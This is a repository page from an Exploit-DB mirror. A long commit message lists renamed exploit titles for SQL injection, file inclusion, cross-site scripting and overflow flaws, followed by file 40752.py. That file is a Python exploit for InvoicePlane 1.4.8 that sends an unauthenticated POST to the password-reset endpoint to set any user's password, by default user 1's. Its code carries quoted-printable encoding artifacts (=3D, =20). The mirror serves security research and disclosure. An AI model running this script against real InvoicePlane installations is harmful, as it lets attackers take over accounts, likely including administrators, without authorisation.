bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40752.py
Offensive Security 8a72733f20 DB: 2016-11-12 
1 new exploits

PunBB 2.0.10 - (Register Multiple Users) Denial of Service
PunBB 2.0.10 - (Register Multiple Users) Denial Of Service

QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities
QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities

Apple iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)
Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflow (PoC)

Apple QuickTime - MOV File Parsing Memory Corruption
Apple QuickTime - '.mov' Parsing Memory Corruption

Apple QuickTime - (rtsp URL Handler) Stack Buffer Overflow
Apple QuickTime - 'rtsp URL Handler' Stack Buffer Overflow
Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow
Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit
Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Buffer Overflow
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting

Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow
Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow

Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities
Philips VOIP841 'Firmware 1.0.4.800' - Multiple Vulnerabilities

Ourgame GLWorld 2.x - hgs_startNotify() ActiveX Buffer Overflow
Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow

Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow

PunBB 1.2.4 - (change_email) SQL Injection
PunBB 1.2.4 - 'id' Parameter SQL Injection

PHP Live Helper 1.x - 'abs_path' Remote File Inclusion
PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion

PHP Live! 3.2.1 - (help.php) Remote File Inclusion
PHP Live! 3.2.1 - 'help.php' Remote File Inclusion

PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion
PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion

nuBoard 0.5 - (index.php site) Remote File Inclusion
nuBoard 0.5 - 'site' Parameter Remote File Inclusion

vKios 2.0.0 - (products.php cat) SQL Injection
vKios 2.0.0 - 'cat' Parameter SQL Injection

Joomla! Component xfaq 1.2 - (aid) SQL Injection
Joomla! Component xfaq 1.2 - 'aid' Parameter SQL Injection

nuBoard 0.5 - (threads.php ssid) SQL Injection
nuBoard 0.5 - 'ssid' Parameter SQL Injection
Joomla! Component paxxgallery 0.2 - (iid) SQL Injection
Joomla! Component MCQuiz 0.9 Final - (tid) SQL Injection
Joomla! Component Quiz 0.81 - (tid) SQL Injection
Joomla! Component mediaslide (albumnum) - Blind SQL Injection
LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion
Joomla! Component paxxgallery 0.2 - 'iid' Parameter SQL Injection
Joomla! Component MCQuiz 0.9 Final - 'tid' Parameter SQL Injection
Joomla! Component Quiz 0.81 - 'tid' Parameter SQL Injection
Joomla! Component mediaslide - 'albumnum' Blind SQL Injection
LookStrike Lan Manager 0.9 - Remote / Local File Inclusion

PHP Live! 3.2.2 - (questid) SQL Injection (1)
PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (1)

Mambo Component Quran 1.1 - (surano) SQL Injection
Mambo Component Quran 1.1 - 'surano' Parameter SQL Injection

Simple CMS 1.0.3 - (indexen.php area) SQL Injection
Simple CMS 1.0.3 - 'area' Parameter SQL Injection

XPWeb 3.3.2 - (download.php url) Remote File Disclosure
XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure
Joomla! Component com_pccookbook - (user_id) SQL Injection
Joomla! Component com_clasifier - 'cat_id' SQL Injection
PHP-Nuke Module books SQL - 'cid' SQL Injection
XOOPS Module myTopics - 'articleId' SQL Injection
Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection
Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection
PHP-Nuke Module books SQL - 'cid' Parameter SQL Injection
XOOPS Module myTopics - 'articleId' Parameter SQL Injection
PHP-Nuke Module Sections - (artid) SQL Injection
PHP-Nuke Module EasyContent - (page_id) SQL Injection
RunCMS Module MyAnnonces - 'cid' SQL Injection
XOOPS Module eEmpregos - 'cid' SQL Injection
XOOPS Module Classifieds - 'cid' SQL Injection
PHP-Nuke Modules Okul 1.0 - (okulid) SQL Injection
Joomla! Component com_hwdvideoshare - SQL Injection
PHP-Nuke Module Docum - (artid) SQL Injection
Globsy 1.0 - (file) Remote File Disclosure
PHP-Nuke Module Inhalt - 'cid' SQL Injection
PHP-Nuke Module Sections - 'artid' Parameter SQL Injection
PHP-Nuke Module EasyContent - 'page_id' Parameter SQL Injection
RunCMS Module MyAnnonces - 'cid' Parameter SQL Injection
XOOPS Module eEmpregos - 'cid' Parameter SQL Injection
XOOPS Module Classifieds - 'cid' Parameter SQL Injection
PHP-Nuke Modules Okul 1.0 - 'okulid' Parameter SQL Injection
Joomla! Component Highwood Design hwdVideoShare - SQL Injection
PHP-Nuke Module Docum - 'artid' Parameter SQL Injection
Globsy 1.0 - 'file' Parameter Remote File Disclosure
PHP-Nuke Module Inhalt - 'cid' Parameter SQL Injection

Joomla! Component paxxgallery 0.2 - (gid) Blind SQL Injection
Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection

Pre Simple CMS - (Authentication Bypass) SQL Injection
Pre Simple CMS - SQL Injection (Authentication Bypass)

Joomla! Component com_pccookbook - (recipe_id) Blind SQL Injection
Joomla! Component com_pccookbook - 'recipe_id' Parameter Blind SQL Injection

PHP Live! 3.2.1/2 - '&x=' Blind SQL Injection
PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection

PHP Live! 3.2.2 - (questid) SQL Injection (2)
PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (2)

PunBB Automatic Image Upload 1.3.5 - Delete Arbitrary File Exploit
PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete

Really Simple CMS 0.3a - (pagecontent.php PT) Local File Inclusion
Really Simple CMS 0.3a - 'PT' Parameter Local File Inclusion

Simple CMS Framework 1.0 - (page) SQL Injection
Simple CMS Framework 1.0 - 'page' Parameter SQL Injection

PHP Live! 3.3 - (deptid) SQL Injection
PHP Live! 3.3 - 'deptid' Parameter SQL Injection

Getsimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Getsimple CMS 2.01 - Multiple Vulnerabilities

GNUBoard 4.33.02 - tp.php PATH_INFO SQL Injection
GNUBoard 4.33.02 - 'tp.php' PATH_INFO SQL Injection

auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities

PunBB 1.x - profile.php User Profile Edit Module SQL Injection
PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection

PunBB 1.2.x - search.php SQL Injection
PunBB 1.2.x - 'search.php' SQL Injection

PHP Live! 3.0 - Status_Image.php Cross-Site Scripting

PHP Live Helper 2.0 - chat.php Cross-Site Scripting
PHP Live! 3.2.2 - setup/transcripts.php search_string Parameter Cross-Site Scripting
PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting
PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting
artmedic weblog - artmedic_print.php date Parameter Cross-Site Scripting
artmedic weblog - 'index.php' jahrneu Parameter Cross-Site Scripting

PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities

PunBB 1.3 - 'viewtopic.php' Cross-Site Scripting
InvoicePlane 1.4.8 - Password Reset

Getsimple CMS 2.01 - admin/template/error_checking.php Multiple Parameter Cross-Site Scripting

Getsimple CMS 2.01 - 'admin/changedata.php' Cross-Site Scripting
Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting

Getsimple CMS 2.03 - 'admin/upload-ajax.php' Arbitrary File Upload
Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload

PunBB 1.3.6 - 'browse.php' Cross-Site Scripting
Getsimple CMS 3.1 - admin/theme.php err Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/pages.php error Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/index.php Multiple Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/upload.php path Parameter Cross-Site Scripting
Getsimple CMS - /admin/edit.php Multiple Parameter Cross-Site Scripting
Getsimple CMS - /admin/filebrowser.php Multiple Parameter Cross-Site Scripting
2016-11-12 05:01:20 +00:00

27 lines
832 B
Python
Executable file
Raw Blame History

# Exploit Title: InvoicePlane v1.4.8 Incorrect Access Control for password =
reset
# Date: 12-11-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: https://invoiceplane.com
# Software Link: https://invoiceplane.com/download/v1.4.8
# Version: v1.4.8=20
# Tested on: ubuntu 16.04 LTS
# Description: An unauthenticated user can POST to=20
# /index.php/sessions/passwordreset setting a new password for any user
import urllib2, urllib
#set parameters here
user_id =3D '1'
new_password =3D 'haxor'
baseUrl =3D 'http://localhost/'
####
data =3D urllib.urlencode({'user_id': user_id,=20
=09=09=09 'new_password' : new_password,
=09=09=09 'btn_new_password' : '1'})
req =3D urllib2.Request(baseUrl + 'index.php/sessions/passwordreset', data)
response =3D urllib2.urlopen(req)
Reference in a new issue View git blame Copy permalink